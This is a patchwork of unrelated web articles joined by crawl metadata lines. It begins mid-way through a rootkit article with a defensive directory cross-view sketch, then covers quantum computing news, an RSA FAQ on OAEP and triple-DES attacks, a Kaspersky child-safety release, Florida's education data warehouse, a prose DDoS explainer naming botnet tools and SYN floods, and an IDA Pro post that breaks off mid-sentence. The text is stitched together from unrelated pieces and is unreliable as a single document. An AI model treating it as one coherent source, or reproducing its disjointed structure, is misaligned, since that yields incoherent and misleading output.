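    out = subprocess.run(["ls", "-A", path],         # view 2: ls utility
                         capture_output=True, text=True, check=True)
    shell_view = set(out.stdout.split())             # toy parse: no spaces
    return api_view - shell_view, shell_view - api_view

# Demo on a fresh directory: the two views should agree exactly.
demo = tempfile.mkdtemp()
for name in ("a.txt", "b.txt", ".hidden"):
    open(os.path.join(demo, name), "w").close()
hidden_from_shell, hidden_from_api = cross_view_listing(demo)
print(hidden_from_shell, hidden_from_api)  # set() set()
```

Both views here ultimately go through the same kernel, so this sketch only conveys the principle; production scanners bypass the standard API precisely because that is what rootkits hook.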
A few years ago, a rootkit was not commonly seen on computers unless purposely planted there by a hacker to hide their activity. As more and more malware is created for the purpose of making money through cyber crime, the criminals need a more advanced way to protect their interests. In many cases, these methods are the use of rootkits to hide the money-making malware and make it difficult for traditional anti-malware and anti-virus program to remove them. Some rootkits are used to generate money on their own by acting as Trojan installers and advertisement engines.
Though the vast majority of rookits are used for criminal purposes, rootkits have been used for what may be considered more legitimate reasons. For example, in 2005 Sony Music decided to use rootkit technology as part of their Digital Rights Management protection. Unfortunately, they did not publicly disclose this technology and when it was discovered that rootkit technology, that could easily have been abused, was in use, security professionals and users were quick to speak out strongly against it. Today rootkit technology is used within legitimate programs such as Alcohol 120% and Daemon tools in order to hide themselves from being seen by anti-piracy programs. Some anti-virus programs also use aspects of rootkit technology in order to protect your computers from viruses.
As you can see, rootkits are a powerful technique that unfortunately are being used more and more by malware to protect themselves. As we analyze new malware that comes out we find that it is now common to find rootkits bundled along with them. Therefore, it is important to be aware of how these files work and that you can discover them using the free ARK scanners described above.
For more information about rootkits, please see the links below. | <urn:uuid:04954ed3-b03e-44fd-9611-1812be9f8157> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/virus-removal/threat/rootkits/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00266-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966659 | 665 | 3.046875 | 3 |
Equal parts fascinating and confounding, the field of quantum computing keeps making headway. Two exciting developments are described in the current issue of Nature, one from a collaboration between Harvard University and MIT researchers and the other from the Max Planck Institute of Quantum Optics in Germany. Their work concerns the fundamental building blocks that make quantum computing possible.
As summarized in Popular Mechanics, the scientists figured out a way to combine atoms and particles of light – photons – to create quantum versions of the switch and the logic gate – two essential elements of classical computing systems.
Quantum computing has long been considered the holy grail of computing. This bizarre world of particle superposition and spooky action at a distance promises to unlock the door to unprecedented kinds of computing tasks. Beyond the killer app of encryption, all sorts of seemingly uncanny things become possible, such as simulations of the universe itself.
At their core, all modern computers involve data and rules. In classical computing, the smallest unit of data is a bit, represented as a 0 or a 1. In quantum computing, the bit becomes a q-bit and instead of just being able to represent two states, it can exist in multiple states. “Superposition,” as this phenomenon is called, allows a lot of information to be acted on in a very small space, setting the stage for incredibly fast supercomputers.
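A classical simulation makes the qubit idea concrete (illustrative only; simulating n qubits this way needs 2^n amplitudes, which is exactly why real quantum hardware is interesting). A single qubit is described by two amplitudes, and measurement yields 0 or 1 with probabilities given by their squared magnitudes:

```python
import math
import random

# Classical simulation of ONE qubit: the state is a pair of amplitudes
# (a, b) for |0> and |1>, with |a|^2 + |b|^2 = 1.
def hadamard_on_zero():
    """Equal superposition, as a Hadamard gate produces from |0>."""
    a = 1 / math.sqrt(2)
    return (a, a)

def measure(state):
    """Measurement collapses the state: 0 with probability |a|^2, else 1."""
    a, _b = state
    return 0 if random.random() < abs(a) ** 2 else 1

# Sampling many measurements of the equal superposition gives roughly
# half zeros and half ones.
samples = [measure(hadamard_on_zero()) for _ in range(10_000)]
print(sum(samples) / len(samples))  # close to 0.5
```

Each measurement returns a definite 0 or 1, never "both"; the superposition shows up only in the statistics across many runs, which is one reason quantum algorithms must be designed so that the useful answer survives measurement.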
Superposition states are fragile, though, and must be coaxed into being. “At this point, very small-scale quantum computers already exist,” says Mikhail Lukin, the head of the Harvard research team. “We’re able to link, roughly, up to a dozen qubits together. But a major challenge facing this community is scaling these systems up to include more and more qubits.”
The new quantum logic gate and switch introduce a new method of connecting particles, using trapped rubidium atoms and photons. The Harvard and MIT scientists created the switch by coupling one rubidium atom with a single photon, enabling both the atom and the photon to switch the quantum state of the other particle. Being able to go from a ground state to an excited state, the atom-photon coupling can transmit information like a transistor in a classical computing system.
The German research group used mirror-like sheets and lasers to trap the atom, forming quantum gates, which change the direction of motion or polarization of photons. When the rubidium atom is in superposition, the photon both does and does not enter the mirror, and both does and does not get a polarization change. Via an attribute of quantum physics called entanglement swapping, multiple photons can share superposition information. These entangled photons are made to bounce repeatedly off the mirror-trapped rubidium atom, acting as the input for the logic gate.
“The Harvard/MIT experiment is a masterpiece of quantum nonlinear optics, demonstrating impressively the preponderance of single atoms over many atoms for the control of quantum light fields,” said Gerhard Rempe, a professor at the Max Planck Institute of Quantum Optics and part of the German research team, upon reading the paper from his US counterparts. “The coherent manipulation of an atom coupled to a photonic crystal resonator constitutes a breakthrough and complements our own work … with an atom in a dielectric mirror resonator.”
7.10 What is OAEP?
Optimal Asymmetric Encryption Padding (OAEP) is a method for encoding messages developed by Mihir Bellare and Phil Rogaway [BR94]. The technique of encoding a message with OAEP and then encrypting it with RSA is provably secure in the random oracle model. Informally, this means that if hash functions are truly random, then an adversary who can recover such a message must be able to break RSA.
An OAEP encoded message consists of a ``masked data'' string concatenated with a ``masked random number''. In the simplest form of OAEP, the masked data is formed by taking the XOR of the plaintext message M and the hash G of a random string r. The masked random number is the XOR of r with the hash H of the masked data. The input to the RSA encryption function is then
[M ⊕ G(r)] || [r ⊕ H(M ⊕ G(r))]
Often, OAEP is used to encode small items such as keys. There are other variations on OAEP (differing only slightly from the above) that include a feature called ``plaintext-awareness''. This means that to construct a valid OAEP encoded message, an adversary must know the original plaintext. To accomplish this, the plaintext message M is first padded (for example, with a string of zeroes) before the masked data is formed. OAEP is supported in the ANSI X9.44, IEEE P1363 and SET standards.
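To make the construction above concrete, here is a deliberately minimal sketch of the core OAEP encode/decode steps in Python. It is my illustration, not the RSAES-OAEP of PKCS #1 (there are no length checks, no zero-padding of M for plaintext-awareness, and fixed 32-byte sizes), and SHA-256 merely stands in for the mask functions G and H:

```python
import hashlib

# SHA-256 plays the role of the "random oracle" hash functions G and H.
def G(r):  return hashlib.sha256(b"G" + r).digest()
def H(x):  return hashlib.sha256(b"H" + x).digest()

def xor(a, b):  return bytes(x ^ y for x, y in zip(a, b))

def oaep_encode(message, r):
    masked_data = xor(message, G(r))         # M xor G(r)
    masked_random = xor(r, H(masked_data))   # r xor H(M xor G(r))
    return masked_data + masked_random       # the block RSA would encrypt

def oaep_decode(encoded):
    masked_data, masked_random = encoded[:32], encoded[32:]
    r = xor(masked_random, H(masked_data))   # unmask the random string
    return xor(masked_data, G(r))            # then unmask the message

msg = b"a 256-bit session key goes here!"    # exactly 32 bytes
r = hashlib.sha256(b"not actually random").digest()  # stand-in for random r
encoded = oaep_encode(msg, r)
print(len(encoded), oaep_decode(encoded) == msg)  # 64 True
```

Note how decoding first recovers r from the masked random number and only then unmasks the data; without knowing the whole encoded block, neither half reveals anything about M.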
3.2.6 What is triple-DES?
For some time it has been common practice to protect information with triple-DES instead of DES. This means that the input data is, in effect, encrypted three times. There are a variety of ways of doing this; the ANSI X9.52 standard (see Question 5.3.1) defines triple-DES encryption with keys k1, k2, k3 as
C = Ek3(Dk2(Ek1(M))),
where Ek and Dk denote DES encryption and DES decryption, respectively, with the key k. This mode of encryption is sometimes referred to as DES-EDE. Another variant is DES-EEE, which consists of three consecutive encryptions. There are three keying options defined in ANSI X9.52 for DES-EDE:
- The three keys k1, k2 and k3 are independent.
- k1 and k2 are independent, but k1 = k3.
- k1 = k2 = k3.
The third option makes triple-DES backward compatible with DES.
The use of double and triple encryption does not always provide the additional security that might be expected. For example, consider the following meet-in-the-middle attack on double encryption [DH77]. We have a symmetric block cipher with key size n; let Ek(P) denote the encryption of the message P using the key k. Double encryption with two different keys gives a total key size of 2n. However, suppose that we are capable of storing Ek(P) for all keys k and a given plaintext P, and suppose further that we are given a ciphertext C such that C = Ek2(Ek1(P)) for some secret keys k1 and k2. For each key l, there is exactly one key k such that Dl(C) = Ek(P). In particular, there are exactly 2^n possible keys yielding the pair (P,C), and those keys can be found in approximately O(2^n) steps. With the capability of storing only 2^p < 2^n keys, we may modify this algorithm and find all possible keys in O(2^(2n-p)) steps.
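The meet-in-the-middle attack just described is easy to demonstrate on a toy cipher. The 8-bit "cipher" below is invented purely for illustration (XOR with the key followed by a fixed S-box permutation); with it, double encryption under two 8-bit keys (2^16 key pairs) falls to roughly 2 x 2^8 cipher operations plus a table lookup:

```python
import random

# Toy 8-bit block cipher, invented purely for illustration: XOR with the
# key, then a fixed key-independent S-box permutation.
rng = random.Random(0)          # deterministic "random" S-box
SBOX = list(range(256))
rng.shuffle(SBOX)
INV = [0] * 256
for i, v in enumerate(SBOX):
    INV[v] = i

def E(k, p): return SBOX[p ^ k]   # encrypt one byte
def D(k, c): return INV[c] ^ k    # decrypt one byte

def meet_in_the_middle(pairs):
    """Find (k1, k2) with C = E(k2, E(k1, P)) in about 2 * 2^8 cipher
    operations plus a 2^8-entry table, not a 2^16 exhaustive search."""
    p0, c0 = pairs[0]
    forward = {E(k1, p0): k1 for k1 in range(256)}   # encrypt from the front
    candidates = [(forward[D(k2, c0)], k2)           # decrypt from the back,
                  for k2 in range(256)               # meet in the middle
                  if D(k2, c0) in forward]
    # Extra known (P, C) pairs weed out coincidental matches.
    return [(k1, k2) for k1, k2 in candidates
            if all(E(k2, E(k1, p)) == c for p, c in pairs[1:])]

k1, k2 = 0x3A, 0xC5                                  # the "secret" keys
pairs = [(p, E(k2, E(k1, p))) for p in (0x42, 0x9D, 0x07)]
recovered = meet_in_the_middle(pairs)
print((k1, k2) in recovered)  # True: the secret pair is among the survivors
```

The table of forward encryptions is the "storage of Ek(P) for all keys k" in the text above; scaled to a real 56-bit cipher like DES, the same trade of memory for time is what makes naive double encryption far weaker than its nominal 112-bit key size suggests.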
Another example is given in [KSW96], where triple EDE encryption with three different keys is considered. Let K = (ka, kb, kc) and K′ = (ka ⊕ Δ, kb, kc) be two secret keys, where Δ is a known constant and ⊕ denotes XOR. Suppose that we are given a ciphertext C and the corresponding decryptions P and P′ of C with the keys K and K′, respectively. Since P′ = Dka⊕Δ(Eka(P)), we can determine ka (or all possible candidates for ka) in O(2^n) steps, where n is the key size. Using an attack similar to the one described above, we may determine the rest of the key (that is, kb and kc) in another O(2^n) steps.
Attacks on two-key triple-DES have been proposed by Merkle and Hellman [MH81] and Van Oorschot and Wiener [VW91], but the data requirements of these attacks make them impractical. Further information on triple-DES can be obtained from various sources [Bih95] [KR96]. | <urn:uuid:75364369-17b5-4af8-8514-5e43f83a5521> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/triple-des.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00384-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916324 | 709 | 3.875 | 4 |
'Stranger Danger!' Young people not aware of the risks when it comes to online friends, reveals national research
07 Feb 2011
As many as 43 per cent of people with internet access have online ‘friends’ they have never met in real life, according to research released today by Kaspersky Lab, Europe’s largest antivirus company. The online research, undertaken by YouGov, is being released to coincide with Safer Internet Day 2011 and highlights that over half (54%) of those aged between 18 and 24 have online friends they haven’t met in real life, raising the possibility that young people today are sharing personal information with strangers.
This makes worrying reading when compared with the findings of a Europe-wide survey by EU Kids Online. This survey found that a lack of discrimination in online relationships risked exposing vulnerable young people to sexual messages (received by 15 per cent of 11 to 16 year olds), data misuse (experienced by nine per cent of 11 to 16 year olds) and bullying posts (received by five per cent of nine to 16 year olds, but identified as by far the most upsetting.)
With a third of nine to 16 year olds now surfing the web on a mobile device, it is imperative that new ways of protecting young people are implemented.
The YouGov survey found that parents are often unaware of what their children are looking at on their mobile phones. Around half (49 per cent) of parents with children under 18 who have internet-enabled mobile devices don’t monitor their children’s mobile web habits. Young people generally regard their mobile phones as personal and private, so the 51 per cent of parents who do supervise their children’s mobile phone habits risk having such behaviour seen as upsetting and invasive by their children.
Kaspersky Lab is committed to helping young people and their parents address these challenges and acquire the knowledge and tools they need to stay safe online.
“A parent instinctively wants to protect their child from harm,” said Malcolm Tuck, managing director of Kaspersky Lab UK. “That may not always be possible, but there is much we can do to minimise the danger, both in real life and in the virtual world.”
“We also believe that technology alone is not the answer, which is why our dedicated website www.kaspersky.co.uk/safer contains advice and guidance for parents, guardians and children. Protecting young people online means talking to them about the dangers and giving them the confidence and control they need to surf safely,” continued Tuck.
To learn more about the broad range of activities taking place around Safer Internet Day: Our Virtual Lives, please visit www.saferinternet.org. | <urn:uuid:a514ccb4-a27e-43a1-8266-ea2e3e71c0d5> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/press/2011/_Stranger_Danger_Young_people_not_aware_of_the_risks_when_it_comes_to_online_friends_reveals_national_research | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00110-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95862 | 568 | 2.703125 | 3 |
Reducing 'noise' in quantum computing is more difficult than first believed
- By William Jackson
- Apr 09, 2009
From a theoretical point of view, work on quantum computing is moving along at a good clip.
The first classical computing machines were envisioned around 1800, long before the introduction of electronics, and it took about 150 years to produce a practical computer even though the theory had long been worked out, said Bryan Eastin, an information theorist with the National Institute of Standards and Technology (NIST).
“In that respect we’re doing pretty good, in that I expect we will have [a quantum computer] in less than 100 years,” Eastin said. “There are no theoretical difficulties, but there are a lot of painful technical difficulties.”
One of those difficulties — the problem of "noise," or errors in calculations introduced by stray energy — turns out to be more difficult than thought. Eastin and NIST mathematician Emanuel Knill proved in a paper in the March 20 issue of Physical Review Letters that one promising technique for squelching quantum noise is actually impossible.
The technique, called transversal encoded quantum gates, seemed simple at first (at least to a physicist). “But after substantial effort, no one was able to find a quantum code to do that,” Eastin said. “We were able to show that a way doesn’t exist.”
This is not a big setback for quantum computing, he said.
“This was not the only path for doing it,” he said. So many years had been spent trying to solve the problem that many scientists already were beginning to suspect that it could not be done. “It has already been factored in” to much of the research, he added.
Quantum computing uses subatomic particles, rather than binary bits, to carry and manipulate information. While a traditional bit is either on or off, a 1 or a 0, a quantum bit (or qubit) can exist in both states simultaneously. Once harnessed, this superposition of states should let quantum computers extract patterns from possible outputs of huge computations without performing all of them, allowing them to crack complex problems not solvable by traditional binary computers.
But noise in these computations is a problem because quantum computing does not allow bits of data to be copied for error checking, as traditional computing does. Transversal gates were supposed to solve this problem by preventing qubits that are going to be error corrected together from interacting, thus squelching the noise of errors. Similar gates have been designed for other purposes, but Eastin and Knill were able to show a mathematical proof that the structure of quantum space is not amenable to this particular technique.
With transversal gates ruled out, scientists now are free to move on to greener fields of research and come up with better solutions, Eastin said.
How close are we to practical quantum computing?
“I don’t expect there to be a quantum computer in the next 10 or even 20 years that can do things a classical computer can’t do,” Eastin said. “I may be wrong.”
The development of quantum computing has the advantage of being able to draw on experience from classical computing. At least researchers now know about the need for error correction.
Now that he has finished off transversal gates, Eastin has a number of other research irons in the fire, such as quantum discord, a measure of non-classical correlation in quantum systems.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:913c472f-ad58-4030-9dc7-7e0f29669a90> | CC-MAIN-2017-04 | https://gcn.com/articles/2009/04/09/quantum-computing-noise.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00412-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965975 | 748 | 3 | 3 |
Question 5) Test Yourself on CompTIA i-Net+.
SubObjective : Identify Suspicious Network Activities
Single Answer Multiple Choice
Which kind of attack is one that floods a computer with bogus TCP/IP addresses?
A. SYN flood
B. DOS flood
C. PING flood
D. Mail flood
A. SYN flood
A SYN flood is an attack targeted at TCP that, when successful, will leave computers unable to connect to network resources. A SYN flood works by sending numerous TCP synchronization (SYN) packets during the three-way handshake of establishing a session. During a three-way handshake, a computer opens a session by sending a TCP packet known as a SYN to another computer. A hacker who is SYN flooding will send numerous SYN packets.
When the targeted computer receives the SYN packet, it returns a SYN acknowledgement (ACK) packet and places the outstanding SYN ACK reply in a buffer to wait for its response. The hacker will use a bad IP address so that when the SYN ACK is returned to the original computer it will never arrive. Meanwhile, the targeted computer is still receiving SYN requests and adding their SYN ACK replies to its buffer. Once this buffer is full, the targeted system will no longer accept arriving SYN requests. In order to move a SYN ACK reply out of the buffer, the initiating computer will need to send an ACK, which completes the three-way handshake.
Eventually, the computer's buffer fills with unanswered SYN ACK replies, and it is unable to accept any new SYN requests, making it impossible for other computers to establish a session with this computer. This is an example of a denial-of-service attack. In order to find out who has initiated such an attack, you should examine the source and destination IP addresses.
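The buffer-exhaustion mechanism described above can be sketched as a toy simulation (the backlog size and addresses here are invented for illustration; real TCP stacks are considerably more involved):

```python
from collections import deque

BACKLOG_SIZE = 8  # hypothetical size of the server's half-open (SYN ACK) buffer

def simulate_syn_flood(syn_sources, acks_received):
    """Toy model of the SYN backlog: each SYN whose SYN ACK is never
    acknowledged occupies a buffer slot; once full, new SYNs are refused."""
    backlog = deque()
    refused = 0
    for src_ip in syn_sources:
        if src_ip in acks_received:
            continue  # handshake completes; the entry would leave the buffer
        if len(backlog) >= BACKLOG_SIZE:
            refused += 1  # buffer full: denial of service for new connections
        else:
            backlog.append(src_ip)  # waiting for an ACK that never arrives
    return len(backlog), refused

# An attacker sends 20 SYNs from spoofed addresses that never ACK:
spoofed = [f"10.0.0.{i}" for i in range(20)]
print(simulate_syn_flood(spoofed, acks_received=set()))  # -> (8, 12)
```

With no acknowledgements arriving, the first eight spoofed SYNs fill the buffer and the remaining twelve are refused — exactly the denial-of-service condition the answer describes.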
These questions are derived from the Self Test Software Practice Test for CompTIA Exam #IK0-002: i-Net+. | <urn:uuid:062e8f1e-ed60-443c-8e60-1be197baff05> | CC-MAIN-2017-04 | http://certmag.com/question-5-test-yourself-on-comptia-i-net/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00320-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925242 | 415 | 2.859375 | 3 |
While the world’s greatest athletes were competing for gold at this year’s summer Olympics, some of the greatest minds in space exploration were similarly attempting a world-class achievement. On Sunday evening, NASA’s Mars Science Laboratory (MSL), also known as Curiosity, successfully landed on Mars with help from HPC resources. Yesterday, Dell announced that two clusters housed at NASA’s Jet Propulsion Laboratory (JPL) assisted with the complex landing sequence.
The Galaxy and Nebula systems, each based on Dell's PowerEdge servers, were used to analyze large amounts of data in preparation for Curiosity's landing sequence. Prior to the launch, the clusters were tasked with validating parameters created by the mission team. This information was then uploaded to the rover one week before its arrival.
The anticipation was nerve-wracking to say the least. This was a project that had been active since 2004 and cost $2.5 billion. The delivery method was one of a kind, as the Curiosity team had to develop unique systems to safely land the car-sized rover on the red planet. The moment was aptly named the "seven minutes of terror".
Thankfully, the landing was successful, marking a memorable event in NASA’s history. Jere Carroll, general manager of civilian agencies at Dell Federal, spoke of the collaboration while congratulating the NASA team.
“We’re proud to work hand-in-hand with NASA, a true American institution that provides the world with the understanding that modern day pioneering delivers optimism and the drive to go further,” he said. “Most importantly, we are honored to be able to test and validate this mission’s most critical portion, landing on the Red Planet.” | <urn:uuid:e19b71fb-47c2-4505-8eb9-27e5b4f17291> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/08/07/dell_clusters_help_nasa_stick_landing_of_mars_rover/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00136-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965706 | 364 | 2.8125 | 3 |
Florida is a pioneer in data collection, especially in tracking students through their academic careers. The Sunshine State deployed the most comprehensive data warehouse and student database in the country. Florida was the first, and is currently the only, state in the nation to be recognized by the Data Quality Campaign (DQC) for meeting the 10 elements necessary to build a longitudinal data system - a key indicator for meeting the requirements of the No Child Left Behind (NCLB) Act, which became a federal law in 2002.
"Florida has one of the oldest systems, and they've done an incredible job of staying on top of technology and working with state legislators to make them understand the impact and value of data so they can actually support systems and use data in decisions," said Nancy Smith, deputy director of the DQC, a nonprofit organization that aims to improve the collection and use of data in education to improve student achievement.
The DQC's goal is to help every state institute a longitudinal data system by 2009 and change data use in education. Although not required by federal law, longitudinal data systems can track student information from pre-kindergarten through postsecondary schools, giving states the ability - technologically - to meet federal data requirements.
"The federal government never tells a state and there's nothing explicitly in NCLB that says states need this longitudinal data system, but to meet their reporting requirements, you really pretty much have to," Smith said. "NCLB was definitely the impetus for a lot of states to move forward with building these student-level longitudinal data systems."
Not only do longitudinal data systems help bring states into compliance with the NCLB, these data systems can improve student achievement by informing and improving public education. Longitudinal data systems allow states and school districts to follow students' academic progress throughout their academic careers, determine the effectiveness of specific schools and programs, identify high-performing schools so that educators and the public can learn from best practices, evaluate the effect of teacher preparation and training programs on student achievement, and focus school systems on preparing a higher percentage of students to succeed in rigorous high-school courses, college and the work force, according to the DQC.
Florida has had a long history of data collection, with the Florida Legislature supportive of implementing and enhancing statewide student longitudinal data systems. Currently every legislative budget in Florida requires a certain portion of funding allocated to school districts to be used for data and information services.
Florida began collecting student-level data in 1986 through the Florida Information Resource Network. The network allowed the Florida Department of Education (FDOE) to compare student data with aggregate data collected in summary reports. In 1988, the state began managing transcripts using a computer system that, by 2001, contained more than 900,000 electronic transcripts. By 1994, Florida was using the most progressive, comprehensive and efficient systems for transferring student records in the nation, according to the DQC.
In 1998, Florida implemented the A+ Plan, which established comprehensive school assessments and demanded new levels of accountability. Under the plan, schools receive grades from A to F, which are sent home to parents, published as "report cards" on the FDOE Web site and publicized in the media.
When the plan was first implemented, the FDOE realized it would need to increase what had already been prolific data collection and management of that data. The FDOE soon garnered funding to build a data warehouse that would unify all state school level data in three years.
In 2003, the Florida K-20 educational data warehouse (EDW) was deployed as a single repository of integrated data from 26 state-level source systems. The system links data by Social Security numbers, and tracks the individual progression of students and teachers throughout their academic careers, including demographics, enrollment, course completion, assessment results, financial aid and employment.
ARMed for Organization
The Florida EDW is managed and maintained by the Division of Accountability, Research and Measurement (ARM), a "PK-20" umbrella organization covering the management of school processes and information resources from pre-kindergarten to postsecondary schools.
"(ARM), from an organizational standpoint, does a lot to coordinate things like definitions, business rules about how we coordinate data over time, how we look at things even on an annual basis, and really gives us the ability to do some things that in most states run into organizational barriers," said Jay Pfeiffer, ARM's deputy commissioner.
ARM collects and analyzes data for five organizational areas:
An important impetus for developing the EDW was the desire to consolidate state and federal reporting for Florida schools, rather than having multiple schools issue reports from multiple disparate reporting systems, Pfeiffer explained.
"We basically built our data systems around the idea that not only does it provide auditable resources for funding," he said, "but it also provides a means for Florida to do reporting for No Child Left Behind, the Carl Perkins Act and the Higher Education Act."
As the EDW became a reliable source of data integration and reporting, ARM began to notice how a data warehouse can track students' progress from education to professional careers. Tracking student performance from high school through college can assist high schools in building their curriculum to prepare students for college and the work force, and is one of the 10 requirements essential to building a longitudinal data system by the DQC.
"There began to be a pretty natural question about what happens to people over time, what kinds of things lead to student successes, what are the employment results, what are the characteristics of the educational system that make that happen, what are the best practices from a programmatic standpoint by looking at data longitudinally," Pfeiffer said.
The chief technology officer of the FDOE, Ron Lauver, played a supportive role in the technological process of Florida's data systems. He helped Florida build its longitudinal systems, including the EDW, from the ground up, choosing to use pre-existing technological foundations to build a system tailored to the state, he said.
"The approach Florida took was really important," Lauver said. "We had to do the development here, it wasn't something we could purchase, especially since we were out in front of the pack. There's nobody out there with anything, and if there is chances are things will be done substantially different."
Innovation Goes On
Florida continues its forward push for innovative educational data systems. Sunshine Connections is a five-year partnership with Microsoft to provide a Web-based portal to resources for educators, including interactive classroom management tools, student performance data, collaboration and communications with other teachers. Florida also recently implemented Choices, which offers student educational planning and goals.
It's very important to track data at the student level and share the information within the state and ideally across the state, Smith said, adding that the DQC believes that information resources can change the culture and value of education.
Although Florida might be ahead of the educational curve in many instances, education officials realize more work lies ahead.
"When you build these systems, you don't get to kick your feet back and say, 'Well, we built it, and we're done' when you've actually got something in place," Pfeiffer said. "It's constant. It never ends. The technology issues you have to deal with - assuring elected officials that what you have is for public benefit, trying to get the rust off the old techniques and technologies, and dealing with issues concerning the confidentiality of data - are daily concerns. These are not things that go away."
A distributed denial of service (DDoS) attack takes place when multiple systems flood the bandwidth and resources of a targeted system, usually one or more web servers. Attackers use several different methods to compromise the systems involved.
Malware can carry out DDoS attack mechanisms; one of the best-known examples was MyDoom, whose DoS mechanism was triggered on a specific date and time. This kind of DDoS involves hardcoding the target IP address before the malware is released, so no further communication is needed to launch the attack.
A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (sometimes the trojan already contains one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.
One classic example of a DDoS tool is Stacheldraht. It uses a layered structure: the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn carry out the DDoS attack. Agents are compromised by the handlers through automated routines that exploit vulnerabilities in programs that accept remote connections on the targeted hosts. Each handler can control up to a thousand agents.
These collections of compromised systems are referred to as botnets. DoS tools like Stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification, such as smurf attacks and fraggle attacks (also referred to as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may be used as well. Modern tools can also use DNS servers for DoS purposes.
Attacks like SYN floods, which are actually simple, may appear with a wide range of source IP addresses, giving the impression of a well-distributed DoS. These flood attacks do not require completion of the TCP three-way handshake, and they target the SYN queue rather than the server's bandwidth. Because the source IP addresses can be spoofed, the attack may in fact originate from a single host. The best way to deal with SYN queue flooding is with stack enhancements such as SYN cookies; exhausting the bandwidth completely, however, requires the involvement of many machines.
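The SYN cookie idea can be sketched in a few lines: the server derives the initial sequence number from the connection itself, so it stores no per-connection state until a valid ACK echoes it back. The hashing scheme below is a simplified stand-in; real implementations also fold in a timestamp and the negotiated MSS:

```python
import hashlib

SECRET = b"per-server-secret"  # hypothetical secret known only to the server

def syn_cookie(src_ip, src_port, dst_ip, dst_port):
    """Derive the initial sequence number from the connection 4-tuple, so the
    server keeps no per-connection state until a valid ACK echoes it back."""
    data = f"{src_ip}:{src_port}->{dst_ip}:{dst_port}".encode()
    digest = hashlib.sha256(SECRET + data).digest()
    return int.from_bytes(digest[:4], "big")  # fits a 32-bit TCP sequence number

def ack_is_valid(src_ip, src_port, dst_ip, dst_port, ack_number):
    # TCP acknowledges cookie + 1; the state is recomputed, not looked up.
    expected = (syn_cookie(src_ip, src_port, dst_ip, dst_port) + 1) % 2**32
    return ack_number % 2**32 == expected

cookie = syn_cookie("203.0.113.5", 40000, "198.51.100.7", 80)
assert ack_is_valid("203.0.113.5", 40000, "198.51.100.7", 80, cookie + 1)
```

Because nothing is buffered per half-open connection, a flood of spoofed SYNs consumes no server memory; only a completed handshake creates state.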
Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to make well-known websites unavailable to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion, even against their business rivals.
An attack mounted from a single host falls in the category of a DoS attack. In fact, any attack against availability can be classed as a denial-of-service attack. On the other hand, if an attacker uses multiple systems to launch attacks, one after another, against a remote host, this falls in the category of a DDoS attack.
An attacker gains several major advantages by using a distributed denial-of-service attack: more machines can generate more attack traffic; multiple attack machines are harder to turn off than a single one; and the behavior of each attack machine can be stealthier, making it harder to track and shut down. These attacker advantages create challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack may not help, because the attacker can simply add more attack machines.
Sometimes a machine's owner willingly consents to its use in a DDoS attack. One of the most popular examples is the 2010 DDoS attack against major credit card companies by supporters of WikiLeaks. In cases like this, supporters of the movement (in that case, those opposing the arrest of WikiLeaks founder Julian Assange) chose to download and run the DDoS software themselves.
If you need more about DoS and DDoS attacks, consider this: | <urn:uuid:7131f678-e268-41e9-9dd4-d55a302efdd8> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2012/ddos-distributed-denial-of-service-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00256-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952866 | 911 | 3.046875 | 3 |
Another new feature that will be available in the upcoming version of IDA Pro is the ability to create and render custom data types and formats.
(Embedded instructions disassembled and rendered alongside x86 code)
What are custom types and formats
- Custom data type: A custom type is basically just a way to tag some bytes for later display with a custom format, when the built-in IDA types (dt_byte, dt_word, etc.) are not enough.
For example: an XMM vector, a Pascal string, a half-precision (16 bits) floating-point number, a 16:32 far pointer (fword), uleb128 number and so on.
To define a custom type, you need to provide its name, size (fixed or dynamically calculated), keyword for disassembly and a few other attributes.
- Custom data format:
The custom data format allows you to display a custom or built-in data type in any way you like. You can register several formats for each type and switch between representations.
For example, you might want to switch the display of the same 16-byte XMM vector between four floats or two doubles.
A format definition includes callbacks for printing (to render the value for display) and scanning (used during debugging to change register values).
For example, here is a custom MAKE_DWORD format applied to the built-in dword type:
Its implementation is very simple:
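At its core, a printing callback like this is just a value-to-string function. A standalone sketch of the formatting logic (plain Python for illustration, not the actual IDA SDK callback signature) could be:

```python
def make_dword_format(value):
    """Render a 32-bit value as a MAKE_DWORD()-style macro combining
    its high and low 16-bit halves."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("expected an unsigned 32-bit value")
    hi, lo = value >> 16, value & 0xFFFF
    return f"MAKE_DWORD(0x{hi:04X}, 0x{lo:04X})"

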